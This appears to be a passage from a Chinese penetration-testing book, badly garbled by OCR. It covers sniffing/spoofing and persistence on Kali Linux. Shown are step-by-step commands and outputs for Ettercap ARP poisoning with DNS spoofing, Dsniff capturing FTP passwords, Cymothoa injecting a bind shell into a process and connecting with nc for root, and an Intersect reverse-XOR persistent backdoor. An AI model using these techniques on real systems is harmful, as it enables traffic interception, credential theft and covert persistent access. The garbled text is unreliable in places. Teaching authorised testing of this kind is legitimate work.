本 例 将 使 用 Ettercap 程 序 进 行 DNS 欺 骗 攻 击 。 各 主机 采用 了 前 一 个 
例子 的 配置 方法 。 此 外 ， 本 例 要 使 用 额外 的 两 台 主 机 : IP 为 192.16S.2.1 


的 DNS 服务 器 ; 一 台 诱 导 被 测 主机 连接 的 耳 地 址 为 192.168.2.22 的 Web 
服务 器 。 攻 击 人 员 测 试 主机 的 IP 地 址 为 192.168.2.21。 

欺骗 攻击 的 详细 步骤 如 下 。 

1. 进入 Ettercap 的 图 形 模式 。 

2. 在 菜单 里 依次 选中 Sniff | Unified sniffing， 选 则 相应 的 网 卡 ， 如 
图 10.25 所 示 。 


ettercap NG-0.7.4.2 - O X 
File — Options Help 
Bridged sniffing.. Shift--B 
Set pcap filter... P 
iji Sig eX. 
NG 


[110.25 
3. 在 菜单 中 选择 Hosts | Scan for hosts， 扫 描 网 络 中 的 主机 。 
4. 在 菜单 中 选择 Hosts | Hosts list， 查 看 当前 联网 的 主机 。 
5. 指定 要 欺骗 的 主机 。 本 例 中 ， 我 们 选择 192.168.2.1 (DNS 服务 
器 ) 作为 第 一 目标 。 在 主机 列表 中 ， 选 中 这 个 PP， 然后 点 击 Add to 
Target 1。 接 下 来 ， 选 中 192.168.2.22 并 把 它 添加 为 第 二 目标 Add to 
Target 22， 如 图 10.26 所 示 。 


ettercap NG-0.7.4.2 


Start Targets Hosts View Mitm Filters Logging Plugins Help 
Host List @ | Plugins M 


Name Version Info 

arp.cop 1.1 Report suspicious ARP activity 

autoadd 1.2 Automatically add new victims in the target range 
chk.. poison 1.1 Check if the poisoning had success 

dns.spoof 1.1 Sends spoofed dns replies 


dos. attack 1.0 Run a d.o.s. attack against an IP address 


ARP poisoning victims: 


GROUP 1: 192.168.2.1 F4:EC:38:EC:07:DC 


GROUP 2: 192.168.2.22 08:00:27:43:15:18 
Activating dns. spoof plugin... 


图 10.26 

6. 在 菜单 里 依次 选中 Mitm| Arp poisoning， 以 启动 ARP 攻击 。 现 在 
DNS 服务 絮 和 被 测 的 MAC 地 址 均 认 为 对 方 的 IP 使 用 的 是 攻击 人 员 主 
机 的 MAC 地 址 。 

7. 调整 配置 文件 /usr/share/ettercap/etter.dns ， 将 诱导 服务 器 的 IP 地 
址 绑 定 在 需要 欺骗 (拦截 ) 的 域名 上 。 

google.com A 192.168.2.21 

* google.com A 192.168.2.21 

www.google.com PTR 192.168.2.21 

这 将 把 被 测 主机 与 google.com 之 间 的 全 部 通信 诱导 到 攻击 人 员 部 署 
HJWeb/li 25 ark. ° 


8. 在 菜单 里 依次 选中 Plugins | Manage the plugins ， 然 后 双击 ( 激 


活 ) dns_spoof 揪 件 ( 见 图 10.27) ° 


9. 最 后 ， 我 们 在 被 测 主机 上 打开 浏览 器， 访问 google.com。 这 将 


到 图 10.28 所 示 的 信息 。 
ettercap NG-0.7.4.2 


Start Targets Hosts View Mitm Filters EMEN Plugins Help 
Host List @ | Plugins dj 


Name Version Info 


arp_cop 1.1 Report suspicious ARP activity 

autoadd 1.2 Automatically add new victims in the target range 
chk_ poison 1.1 Check if the poisoning had success 

dns_spoof 1.1 Sends spoofed dns replies 


dos_attack 1.0 Run a d.o.s. attack against an IP address 


ARP poisoning victims: 
GROUP 1:192.168.2.1 F4:EC:38:EC:07:DC 


GROUP 2: 192.168.2.22 08:00:27:43:15:18 
Activating dns. spoof plugin... 


图 10.27 


mozilla Firefox - 
File Edit View History Bookmarks Tools Help 


<a inp - a) & i: |! | http./google corry 


Su Mostvisted* ©) Getting Started Í] Latest Headines Y 


(© http /google comi 中 
It works! 


This is the default web page for this server. 


The web server software is running but no content has been added, yet. 


图 10.28 

上 述 情 况 表 明 ，DNS 期 驻 已 经 委 效 。 被 测 主机 没有 看 到 真正 的 
Google 网 站 ， 它 的 浏览 如 访问 的 是 攻击 人 员 部 署 的 Web 服 务 器 。 

10. 如 需 停 止 攻 击 ， 可 在 染 单 中 依次 选中 Mitm | Stop mitm 
attack(s) ° 

即使 觉得 图 形 界面 的 操作 过 于 索 琐 ， 您 也 不 必 担 心 。 在 Ettercap 的 
文本 模式 里 ， 这 些 操作 要 人 简洁 得 多 。 

在 文本 模式 里 ， 以 下 指令 就 可 完成 刚才 的 前 8 步 操 作 (第 7 步 除 
p 5 

# ettercap -i ethO -T -q -P dns spof -M ARP 
/192.168.2.1//192.168.2.22/ 

上 述 指令 的 运行 结果 如 下 。 

Scanning for merged targets (2 hosts)... 


2 hosts added to the hosts list... 


ARP poisoning victims: 

GROUP 1: 192.168.2.1 F4:EC:38:EC:07:DC 

GROUP 2 : 192.168.2.22 08:00:27:43:15:18Starting Unified sniffing... 
Activating dns spoof plugin... 


dns spoof: [safebrowsing-cache.google.com] spoofed to [192.168.2.21] 
只 要 熟悉 了 Ettercap 各 选项 的 使 用 方法 ， 就 会 发 现 Ettercap 的 文本 模 
式 十 分 方便 。 在 文本 模式 里 ， 按 Q 键 就 可 退出 程序 。 


10.4 网 as 


网 络 嗅 探 器 器 是 监视 网 络 数 据 的 软件 程序 或 硬件 设备 。 人 们 往往 
利用 它 复制 网 络 数据 的 功能 来 检测 网 络 数据 。 借 助 这 类 工具 ， 您 可 以 
看 到 网 络 中 正在 传输 的 信息 。 

不 久之 前 ， 网 络 串 探 器 只 是 网 络 工程 师 用 来 解决 网 络 问题 的 工 
具 。 但 是 ， 它 确实 可 以 用 来 作恶 。 如 采 网 络 数据 以 明文 传输 ， 且 计算 
机 之 间 通 过 集 线 紫 交换 数据 ， 那 么 网 络 里 的 通信 信息 ， 例 如 用 户 名 、 
密码 、 邮 件 内 容 等 ， 将 很 容易 被 他 人 捕获 。 洗 运 的 征 ， 如 果 使 用 交换 
机 组 网 ， 那 么 捕获 数据 的 难度 会 高 一 些 ， 但 是 他 人 仍然 能 够 捕获 信 
E e 
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许多 工具 程序 都 可 用 作 网 络 嗅 探 器 。 本 章 将 介绍 几 款 Kali Linux 收 
录 了 的 网 络 嗅 探 器 。 多 数 情况 下 ， 您 需要 在 嗅 探 数据 以 前 进行 网 络 其 
骗 攻击 〈 请 参考 10.3 节 ) ， 因 为 它 通常 是 成 功 施行 网 络 嗅 探 的 前 提 。 


10.4.1 Dsniff 


Dsniff 能 够 在 网 络 中 捕获 密码 。 目 前 ， 它 可 从 以 下 协议 中 捕获 密 
人 码 : FTP ` Telnet ` SMTP ` HTTP ` POP ` poppass ` NNTP ` IMAP ^ 
SNMP ` LDAP ^ Rlogin ` RIP » OSPF ` PPTP MS-CHAP ^ NFS ` 
VRRP ` YP/NIS ` SOCKS ` X11 ` CVS ` IRC ^ AIM ` ICQ ` Napster ^ 
PostgreSQL ` Meeting Maker ` Citrix ICA ` Symantec pcAnywhere ` NAI 
Sniffer ^ Microsoft SMB ` Oracle SQL*Net ^ Sybase 以 及 Microsoft 
SQL ° 

如 需 局 动 dsnifft 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 


# dsniff -h 

Extfe- t YEA EBERE E ton EY BY (Lo Ri TEH REA 
FTP 密码 。 在 本 例 的 演示 中 ，FTP 客 户 端的 卫 是 192.168.2.20， 服 务 器 IP 
则 是 192.168.2.22， 这 两 台 主 机 通过 集线器 连接 。 攻 击 人 员 的 主机 耳 为 
192.168.2.21 » 

在 攻击 人 员 的 测试 主机 上 执行 下 述 指令 e 

# dsniff -i ethO -m 

其 中 ， 选 项 -ieth0 将 使 Dsniff 程序 监听 etho 网 卡 。 而 选项 -m 则 用 
于 启用 程序 的 自动 协议 检测 功能 。 

然后 ， 在 装 有 FTP 客 户 端 程序 的 主机 上 ， 使 用 客户 端 程序 登录 FTP 
服务 器 。 

dsnif 的 运行 结 采 如 下 。 

dsniff: listening on ethO 


20/08/13 18:54:53 tcp 192.168.2.20.36761 -> 192.168.2.22.21 (ftp) 

USER user 

PASS user01 

从 中 可 以 看 到 ，dsniff 捕 获 了 客户 端 登 录 FTP 服 务 侣 时 所 用 的 用 户 
名 和 密码 。 


10.4.2 tcpdump 


tcpdump 程 序 是 一 款 网 络 嗅 探 句 ， 它 可 以 捕获 符合 条 件 表达 式 的 网 
络 数 据 包 。 在 没有 指定 条 件 表 达 式 的 情况 下 ， 它 会 显示 所 有 网 络 数 据 
包 。 而 在 指定 条 件 表 达 式 的 情况 下 ， 它 只 会 捕获 符合 条 件 表达 式 的 数 
388 ° 

tcpdump 还 可 以 将 网 络 数 据 包 存储 为 文件 ， 或 从 文件 中 读 取 网 络 数 
据 。 


如 需 启 动 tcpdump 程 序 ， 可 在 终端 中 执行 下 面 这 类 指令 。 

# tcpdump —i eth0 —s 96 

这 个 命令 将 监听 eth0 网 卡 (-iethO) ， 捕 获 大 小 为 96 Z (-s 96) 
的 数据 包 。 

现在 尝试 嗅 探 从 IP 地 址 10.0.2.15 到 10.0.2.100 的 ICMP 封 包 ， 这 里 设 
置 嗅 探 eth0 接口 (-ieth0) ， 不 需要 把 地 址 转换 成 主机 名 (-n) ， 不 需 
要 打印 时 间 戳 (-0 ， 用 十 六 进 制 格式 和 ASCII 格 式 打印 封包 头 和 数据 

(-X) 。 在 主机 10.0.2.15 处 输入 : 

# tcpdump -n -t -X -i ethO -s 64 icmp and src 192.168.56.102 and 
dst192.168.56.101 

上 述 指 令 的 运行 结果 如 图 10.29 所 示 。 
root@kali:~# tcpdump -i ethO -s 64 -t -n -X icmp and src 192.168.56.102 and dst 192.168.56.101 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listening on eth0, link-type EN10MB (Ethernet), capture size 64 bytes 
IP 192.168.56.102 » 192.168.56.101: ICMP echo request, id 3860, seq 1, length 64 


0x0000: 4500 0054 9646 4000 4001 b246 cOa8 3866 E..T.FQ.Q..F..8f 
0x0010: cOa8 3865 0800 2134 0f14 0001 34fd ee52 ..86..!4....4..R 


0x0020: 0000 0000 e393 0200 0000 0000 1011 1213 ................ 
0x0030: 1415 m 


图 10.29 
因为 指定 了 条 件 表 达 式 ，tcpdump 程 序 只 会 显示 符合 条 件 表达 式 的 
网 络 数据 包 。 在 上 述 指 令 中 ， 我 们 限定 程序 只 显示 由 卫 为 
192.168.56.102 的 主机 向 也 为 192.168.56.101 的 主机 发 送 的 ICMP 数 据 包 。 


10.4.3 Wireshark 
Wireshark 是 一 个 网 络 协 议 分 析 程序 。 它 的 图 形 程序 可 对 它 捕获 的 
数据 包 进 行 可 视 化 分 析 ， 有 助 于 使 用 人 员 理 解数 据 包 中 的 各 种 信息 。 
Wireshark 的 特征 有 : 
e 能 够 分 析 1000 多 种 网 络 协议 ; 


e 它 具 有 业内 功能 最 强大 的 数据 包 整 理 (显示 过 滤 ) 功能 ; 


e 它 的 GUI 图 形 界面 程序 和 命令 行程 序 TShark 都 可 以 显示 数据 
£l 
o 文 持 ( 读 写 ) 多 种 文件 格式 的 数据 包 文 件 。 兼 容 tcpdump 
(libpcap ) ^ Network GeneralSniffer ^ Cisco Secure IDS iplog ^ 
Microsoft Network Monitor 等 程序 的 文件 格式 ; 
e 可 从 IEEE 802.11、 监 直 、 以 太 网 设备 实时 读 取 数 据 ; 
e 可 将 结果 导出 为 XML、Postscript、CSV 和 文本 格式 的 文件 。 
如 需 启 动 Wireshark 程序 ， 可 在 桌面 菜单 中 依次 选中 Kali Linux| 
Sniffering/Spoofing [Network Sniffers | wireshark ， 或 者 在 终端 中 使 用 下 
述 指令 。 
# wireshark 
上 述 指 令 将 启动 Wireshark 网 络 协 议 分 析 程 序 。 如 果 要 捕捉 网 络 数 
据 ， 可 以 在 Interface List xe AM, 10810.3077 ° 


The Wireshark Network Analyzer 
Ele Edit view Go Capture Analyze Statistics Telephony Tools Help 


gag! ocmaxeose toesee Bee - 


Filter: | Ba Expression... Clear Apply 


The World's Most Popular Network Protocol Analyzer 


| 


E" Interface List 2 Open 


Live list of the capture interfaces (counts incoming packets) Open a previously captured file 


Start capture on interface: Open Recent: 


kt! etho 

kt! Pseudo-device that captures on all interfaces uj Sample Captures 

Ë USB bus number 1 A rich assortment of example capture files on the wiki 

USB bus number 2 
^ 

62 lo 二 


a 


KJ m -—— nmm— ] 
@| Ready to load or capture || No Packets Profile: Default E 
图 10.30 


Wireshark 将 在 窗口 里 显示 在 监听 期 间 捕获 到 的 数据 包 。 如 有 果 要 停 
止 捕捉 网 络 数 据 ， 可 以 点 击 顶端 工具 栏 中 第 四 个 按钮 Stop running the 


live capture, BUA TES FR. E yet Capture | Stop ? 
如 图 10.31 所 示 ， 可 以 在 Filter 栏 里 设置 过 滤 规 则 ， 以 显示 特定 的 数 
据 包 


Capturing from ethO [Wireshark 1.8.5] v i * ii i 
File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
E sxc&a&atc»^t£kíisssimauwvmS:sts 
Filter: |icmp e | Expression... Clear Apply Save 


No. Time Source Destination Protocol Length Info 


P Frame 23: 98 bytes on wire (784 bits), 98 bytes captured (784 bits) on interface O 

P Ethernet II, Src: CadmusCo 1c:51:22 (08:00:27:1c:51:22), Ost: CadmusCo 43:15:18 (08:00:27:43:15:18) 
P Internet Protocol Version 4, Src: 192.168.2.21 (192.168.2.21), Dst: 192.168.2.22 (192.168.2.22) 

b Internet Control Message Protocol 


OO 08 OO 27 43 15 18 O8 OO 27 lc 51 22 08 00 45 00 etc... '.Q*..E. 
010 00 54 OO OO 40 OO 40 01 bs 2d cO a8 02 15 cO a8 TT..@.@. .-...... 
20 02 16 08 00 45 79 lb 9a 00 01l f3 7c 1f 52 00 00 sesei.. ose] T 
30 00 00 bd 49 08 00 OO OO 00 00 10 11 12 13 14 15 eccsleooo osvow。 
O 16 17 18 19 la 1b le ld le 1f 202122232425  ........ .. *f$N 
26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 - ds :/012345 

36 37 


图 10.31 

在 图 10.31 中 ， 我 们 在 Filter 栏 里 设 定好 了 过 滤 规 则 icmp， 以 使 程序 
只 显示 ICMP 协 议 的 数据 包 。 

如 有 果 需 要 调整 捕获 数据 包 的 具体 设置 ， 可 在 染 单 Capture | Options 
中 调整 相应 的 选项 ， 或 在 Wireshark 主 界面 中 直接 选中 Capture Options 
的 图 标 ( 见 图 10.32) ° 

在 这 个 界面 中 ， 您 可 以 调整 以 下 设置 。 

e Network interface (网 络 接 口 /网 卡 ) 。 

e Buffer Size ( 绥 冲 区 大 小 ) : 默认 为 1MB © 

e Packet limitation (数据 包容 量 上 限 ， 以 字 节 为 单位 ) : 默认 情况 
下 没有 限制 。 

e Capture filter to be used (捕获 规则 ) : 默认 情况 下 没有 过 滤 规 
My o 

o 如 需 保 存 捕获 到 的 数据 ， 可 在 Capture file(s) 区 域 里 设置 输出 文件 
的 文件 名 。 


o 如 需 设 置 自动 停止 的 功能 ， 可 在 StopCapture 区 域 里 设置 自动 停止 
捕获 数据 的 触发 条 件 。 触 发 条 件 可 以 是 捕获 数据 包 的 数量 、 捕 获 数据 
包 的 作业 时 间或 是 数据 包 的 大 小 。 

o 在 Name Resolution 区 域 里 ， 各 选项 用 于 控制 MAC 地 址 解析 、 网 
络 名称 解 机 和 传输 名 称 解析 的 功能 选项 。 


Wireshark: Capture Options 
Capture 
Capture Interface Link-Layer header Prom. Mode Snaplen [B] 
etho 
回 192168221 Ethernet enabled default 


fe80-:200:27ff fe1c5122 


[] Linux netfilter log (NFLO... Linux netfilter log messages enabled default 


D | Pseudo-device that captu... Linux cooked enabled default 


D 
C Capture on all interfaces 
M. Capture all in promiscuous mode 


Manage Interfaces 


Capture File(s) r Display Options 
üe[ 0 0 0 0 0 jJ E? Update list of packets in real ime 
O Use multiple files v) Use pcap-ng format 


M! Next file every Z megabyte(s) O Automatic scrolling in live capture 


| 


f 

"- din 

O Next file every 1 > | minute(s) > ^ E 
| 1x) | v Hide capture info dialog 
|2 : 


D Ring buffer with 


D Stop capture after | ~ file(s) 


-Stop Capture ... 


O ... after 1 |=] Packet (s) 


-Name Resolution 


V Enable MAC name resolution 


| ©) Enable network name resolution 


图 10.32 


10.5 本 章 总 结 
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此 处 介绍 的 所 有 工具 都 可 用 来 取得 更 高 的 访问 权限 。 攻 击 人 员 可 以 通 
过 网 络 咒 探 和 网 络 欺 骗 手 段 获得 更 多 的 信息 ， 还 可 能 获取 进入 内 网 或 
着 外 网 中 其 他 主机 的 方式 ， 这 些 信息 中 可 能 售 有 更 具 价 值 的 信息 。 

我 们 最 和 完 介绍 了 本 地 权限 提升 漏洞 的 利用 方法 。 在 利用 说 测 主机 
的 网 络 服务 漏洞 之 后 ， 我 们 发 现 获 取 的 权限 很 低 ， 接 着 我 们 将 目 己 的 
权限 提升 为 root 权限 。 通 过 本 地 安全 漏洞 提升 权限 的 技术 有 很 多 ， 本 
文 利用 的 十 内 核 源 洞 。 

授 下 来 ， 我 们 阐述 了 攻击 密码 的 方法 。 攻 击 的 方法 有 两 种 ， 离 线 
攻击 和 在 线 攻击 。 大 多 数 的 离线 攻击 工具 可 利用 彩虹 表 提 高 破解 速 
度 ， 但 同时 需要 消耗 大 量 的 硬盘 空间 。 离线 攻击 的 好 处 是 可 以 在 自己 
的 机 器 上 进行 ， 而 无 需 担 心 攻 击 会 导致 目标 机 器 上 的 某 个 账户 被 封 
停 。 在 线 攻击 则 可 以 马上 查看 攻击 结果 ， 但 需要 小 心 攻击 可 能 导致 目 
标 机 器 上 的 某 个 账户 被 封 停 。 接 着 ， 本 章 介 绍 了 多 和 蒜 嗅 探 网 络 的 工 
具 ， 最 后 还 介绍 了 一 些 可 用 于 网 络 欺 骗 攻 击 的 工具 。 网 络 咒 探 工具 属 
于 被 动 攻击 工具 。 相 比 之 下 ， 因 为 网 络 欺 骄 工 具 能 够 回 网 络 发 送 数 
据 ， 所 以 属于 主动 攻击 工具 。 

在 下 一 章 ， 我 们 讨论 如 何 维护 已 经 取得 的 访问 权限 。 


1# jaj 


上 一 章 讨论 了 在 目标 主机 上 提升 权限 的 方法 。 本 章 将 介绍 在 渗透 
测试 过 程 的 最 后 一 个 环节 ， 即 帮助 我 们 随时 进入 目标 主机 的 方法 。 

在 完成 了 提升 权限 的 阶段 性 工作 之 后 ， 我 们 应 当 建 立 一 种 机 制 ， 
以 维持 对 目标 主机 的 控制 权 。 这 样 一 来 ， 即 使 我 们 所 利用 的 调 洞 被 补 


] 程序 修复 ， 我 们 还 可 以 继续 控制 目标 系统 。 当 然 ， 在 做 这 项 测试 之 
前 ， 必 须要 和 争 得 客户 的 许可 。 

维持 控制 权 的 程序 可 分 为 以 下 几 类 : 

e 操作 系统 后 门 ; 

e [X LE; 

e Web 后 | ]。 


11.1 操作 系统 后 门 


简单 地 说 ， 所 谓 后 门 (backdoor) ， 沁 指 绕 过 目标 系统 安全 控制 体 
系 的 正规 用 户 认证 过 程 而 维持 我 们 对 目标 系统 的 控制 权 ， 以 及 隐匿 我 
们 控制 行为 的 方法 。 本 将 介绍 多 款 操作 系统 的 后 门 程序 。 


11.1.1 Cymothoa 


Cymothoa 是 一 款 可 以 将 shellcode 注入 到 现 有 进程 的 〈 即 播 进程 ) 
后 门 工具 。 借 助 这 种 注入 手段 ， 它 能 够 把 shellcode 伪 装 成 常规 程序 。 它 
所 注入 的 后 门 程序 应 当 能 够 与 被 注入 的 程序 〈 进 程 ) 共存 ， 以 避免 被 
管理 和 维护 人 员 怀 疑 。 将 shellcode 注 入 到 其 他 进程 ， 还 有 画 外 一 项 优 
A. 即使 目标 系统 的 安全 防护 工具 能 够 监视 可 执行 程序 的 完整 性 ， 只 
要 它 不 检测 内 存 ， 那 么 它 就 不 能 发 现 〈 插 进程 ) 后 门 程序 的 进程 。 

如 需 启动 Cymothoa 程 序 ， 可 使 用 下 壕 指 令 。 

cymothoa 

上 述 指 令 将 会 显示 Cymothoa 程序 的 帮助 信息 。 在 使 用 这 个 程序 
时 ， 必 须 通 过 -p 选项 指定 目标 进程 的 PID ， 并 通过 -s 选 项 指定 shellcode 
的 编号 。 

您 可 在 目标 主机 上 使 用 ps 指令 ， 以 查看 程序 的 PID 信 息 。 另 外， 如 
图 11.1 所 示 ， 您 可 以 使 用 程序 的 -S$ 选 项 列 出 所 有 可 用 的 shellcode 和 对 应 
编号 。 


root@kali:~# cymothoa -S 


- bind /bin/sh to the provided port (requires -y) 

- bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org> 
- bind /bin/sh to tcp port with password authentication (requires -y -o) 
/bin/sh connect back (requires -x, -y) 

- tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org) 

- script execution (see the payload), creates a tmp file you must remove 
forks an HTTP Server on port tcp/8860 - http://xenomuta.tuxfamily.org/ 

- serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com 

- forkbomb (just for fun...) - Kris Katterjohn 

9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org 

10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com) 
1l - POC alarm() scheduled shellcode 

12 - POC setitimer() scheduled shellcode 

13 - alarm() backdoor (requires -j -y) bind port, fork on accept 

14 - setitimer() tail follow (requires -k -x -y) send data via upd 


图 11.1 
在 渗透 到 目标 主机 之 后 ， 可 把 cymothoa 的 可 执行 程序 复制 到 目标 
主机 上 ， 继 而 生成 后 门 程序 。 
此 后 ， 您 需要 决定 shellcode 类 型 以 及 shellcode 的 宿主 进程 。 
在 Linux 系统 中 ， 我 们 可 使 用 ps-aux 指令 查看 当前 运行 的 所 有 程 
序 进程 。 这 个 指令 的 运行 结果 如 图 11.2 所 示 。 


€ 4 O» Ul .» QJ) NJ) — CO 


root 4248 0.0 0.0 0? 02:03 0:00 [nfsd] 
root 4249 0.0 0.0 0 0? : 02:03 0:00 [nfsd) 
root 4250 0.0 0.0 0 0? S 02:03 0:00 c—; 
4 10 nn vil 0:0 
0 0 


S n/rpc. mountd 
em --user daemon --allow 0.0. 
distcca iti --user daemon --allow 0.0. 
0 /usr/lib/postfix/master 
pickup -1 -t fifo -u -c 
amgr -l -t fifo -u 
/usr/sbin/nmbd -D 
/usr/sbin/smbd -D 
/usr/sbin/smbd -D 


4324 
4325 
4329 


4330 
4333 
4335 
4339 


oooooooo 


虽然 返回 结果 分 为 很 多 列 ， 但 是 我 们 只 关注 以 下 几 列 。 

e 第 一 列 : 启动 用 户 。 

e 第 二 列 : PID ° 

e 最 后 一 列 : 指令 。 

本 例 中 ， 我 们 选 定 PID 4255 的 进程 (rpc.mountd) 为 宿主 进程 ， 并 
决定 使 用 第 一 类 shellcode。 另 外 ， 我 们 还 需要 使 用 -y [port number] 选 


项 指定 payload 的 服务 端口 。 综 合 以 上 信息 ， 我 们 需要 使 用 的 指令 如 下 
AAR ° 
/cymothoa —p 4255 -s 1 -y 4444 
上 述 指 令 的 运行 结果 如 图 11.3 所 示 。 
[+] attaching to process 4255 


register info: 


eax value: Oxfffffdfe ebx value: 
esp value: OxbfaS55fbO0 eip value: 0xb7f77410 


new esp: Oxbfa55fac 

payload preamble: fork 
injecting code into 0xb7f78000 
copy general purpose registers 
detaching from 4255 


infected!!! 
图 11.3 
我 们 另 找 一 台 主 机 ， 并 通过 下 述 指 令 连 接 到 目标 主机 的 后 门 
(4444 号 端口 ) ° 
nc -nvv 192.168.56.102 4444 
其 中 ，192.168.56.102 是 目标 主机 的 IP 地 址 。 
我 们 将 会 看 到 图 11.4 所 示 的 信息 。 


root@kali:~# nc 192.168.56.102 4444 
id 
uid=0(root) gid=0( root) 


uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU 
/Linux 


ls 

etab 

rmtab 
rpc_pipefs 
sm 


m.bak 
tate 
v4recovery 
xtab 


图 11.4 


上 述 信息 表明 ， 我 们 成 功 地 连接 到 远程 主机 的 后 门 之 中 ， 并 能 够 
在 目标 主机 上 执行 多 个 指令 。 

这 种 后 门 程序 以 运行 中 的 程序 为 宿主 。 无 论 是 
目标 主机 重启 ， 此 类 后 门 程序 都 会 停止 运行 。 若 要 
需要 使 用 持久 型 后 门 (persistent backdoor) 。 


11.1.2 Intersect 


Intersect 是 一 款 适 合 在 漏洞 利用 以 后 使 用 的 能 够 目 动 完 成 多 种 后 期 
任务 的 程序 。 它 够 自动 收集 密码 文件 、 复 制 SSH 密 钥 、 收 集 网 络 信 
息 ， 并 能 识别 杀毒 软件 和 防火 墙 程序 。 

若 要 使 它 自动 执行 后 期 任务 ， 您 需要 创建 自己 的 脚本 文件 ， 并 在 
脚本 中 指定 所 需 的 各 种 功能 。 对 于 Intersect 来 说 ， 每 个 功能 就 有 对 应 的 
模块 。 

默认 安装 的 Intersect 程序 自身 就 带 有 多 个 功能 模块 。 在 这 些 模 块 
之 中 ,与 信息 收集 相关 的 模块 就 有 下 面 这 些 。 

e creds: 收集 认证 信息 。 


答 主 进程 关闭 或 是 
EDOM ABR, Wi 


e extras: 搜索 操作 系统 和 应 用 程序 的 配置 文件 ， 以 检索 特定 的 应 
用 程序 和 防护 程序 。 

e network: 收集 网 络 信 息 ， 例 如 服务 端口 和 DNS 信息 。 

e lanmap: 枚 举 在 线 主机 并 收集 IP 地 址 。 

e osuser: 枚 举 操作 系统 信息 。 

e getrepos: 用 于 查找 源 代码 的 软件 仓库 。 

e openshares: 在 特定 主机 上 查找 SMB 的 公开 共享 。 

e portscan: 简易 的 端口 扫描 程序 ， 可 扫描 特定 IP 的 1 一 1000 端 


e egressbuster: 在 指定 的 端口 苑 围 内 ， 搜 索 可 用 的 外 联 问 口 。 

e privsec: 检测 Linux 内 核 的 系统 是 否 存 在 可 提 权 的 漏洞 。 

e xmlcrack: 将 哈 硕 列表 发 送 端 远程 XMLRPC， 以 继续 破解 。 

本 章 的 主题 是 维护 控制 权 ， 所 以 本 文 关注 那些 可 创建 shell 连 接 的 
模块 。 

e reversexor: 采用 XOR 加 密 的 reverse shell ° 

e bshell: 基于 TCP 协议 的 bind shell ° 

e rshell: 基于 TCP 协议 的 reverse shell 。 

e xorshell: 采用 XOR 加 密 的 bind shell 。 

e aeshttp: 采用 AES 算法 加 密 的 HTTP Reverse shell ° 

e udpbind: 基于 UDP 协议 的 bindshell; 默认 端口 21541 ° 

e persistent: 会 在 系统 局 动 时 目 动 运行 的 持久 型 后 门 。 

在 创建 Intersect 的 脚本 文件 时 ， 需 要 遵循 的 以 下 几 个 通用 步 又 : 

e 选 定 shell 模块 ; 

e 给 模块 的 变量 赋值 〈 例 如 端口 号 码 和 远程 主机 ) ; 

e 保存 脚本 文件 。 

如 需 启 动 Intersect 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 


intersect 


上 述 指 令 将 会 调 出 Intersect 的 程序 菜单 ， 如 图 11.5 所 示 。 


Create Custom Script 
List Available Modules 
Load Plugin Module 
Exit Creation Utility 


=> | 


图 11.5 
我 们 选择 Create Custom Script， 然 后 会 看 到 图 11.6 所 示 的 界面 。 


=> 1 


Intersect 2.0 - Script Generation Utility 
Beni cs Create Custom Script ----------- 


Instructions: 


Use the console below to create your custom 
Intersect script. Type the modules you wish 
to add, pressing [enter] after each module. 
Example: 

-» creds 

-» network 


When you have entered all your desired modules 
into the queue, start the build process by typing :create. 


** To view a full list of all available commands type :help. 
The command :quit will return you to the main menu. 


图 11.6 
如 需 列 出 全 部 的 模块 ， 可 使 用 modules 指 令 。 该 指令 的 运行 效果 如 


图 11.7 所 示 。 


=> :modules 

rchive creds extras 

shell daemon lanmap osuser 

eshttp getrepos openshares 
ressbuster  icmpshell 


network  reversexor scrub 
rshell xorshell 
portscan sniff webproxy  xmp 


ersistent rivesc udpbind  xmlcrack 


我 们 就 可 通过 符号 => 指 定 某 个 模块 ， 或 用 info 指令 查询 某 模块 的 
具体 信息 。 例 如 ， 可 通过 下 壕 指令 查询 creds 模 块 的 详细 信息 


:info creds 


本 例 将 使 用 reversexor 模 块 创建 持久 型 后 |]。 首 先 要 选 定 这 个 模 
块 。 
=> reversexor 


reversexor added to queue. 


然后 调整 模块 的 默认 选项 ， 并 创建 脚本 文件 ( 见 图 11.8) 。 


=> create 


[ Set Options ] 

If any of these options don't apply to you, press [enter] to skip. 

Enter a name for your Intersect script. The finished script will be placed 
in the Scripts directory. Do not include Python file extension. 

=> test 

Script will be saved as /usr/share/intersect/Scripts/test .py 


Specify the directory on the target system where the gathered files and in 
formation will be saved to. 

*Important* This should be a NEW directory. When exiting Intersect, this d 
ürectory will be deleted if it contains no files. 

If you skip this option, the default(/tmp/lift«$randomstring) will be use d. 
temp directory -» 

nable logging => no 

ind port => 1337 

[*] bind port saved. 

remote host => 192.168.2.23 

[+] remote host saved. 

remote port => 1234 

[+] remote port saved. 

prey port => 

or cipher key => abcd 

[*] xor key saved. 

reversexor 


[*] Your custom Intersect script has been created! 
Location: /usr/share/intersect/Scripts/test. 


图 11.8 

只 有 在 远程 主机 安装 有 文件 scapypy 的 情况 下 ， 才 能 运行 Intersect 
的 脚本 文件 。 如 宁 遇 到 以 下 错误 : 

AttributeError:'module'object has no attribute 'linux_distribution' 

则 说 明 被 测 主机 使 用 的 Python 版 本 过 老 。 此 时 要 将 脚本 中 的 distro2 
—-platform.linux, distribution()[0]EX 7j distro2 = platform. dist()[0] ° 

在 创建 了 后 门 程序 之 后 ， 要 把 它 上 传 到 目标 主机 上 ， 并 在 目标 主 
机 上 执行 。 


11.1.3 Meterpreter 后 门 


著名 的 Metasploit meterpreter 程序 自 带 一 个 名 为 metsvc 的 后 门 程 
Pe, E MNA uus o 
小 心 的 是 ，metsvc 程 序 没有 采用 任何 认证 机 制 。 换 句 话说 ， 所 
a esa ] 问 口 的 人 都 应 该 能 够 使 用 这 个 后 门 。 
本 例 使 用 Windows XP 系统 的 主机 当 作 被 测 主机 。 被 测 主机 使 用 
192.168.2.21 作为 其 IP 地 址 ， 而 测试 主机 的 IP 地 址 是 192.168.2.22。 
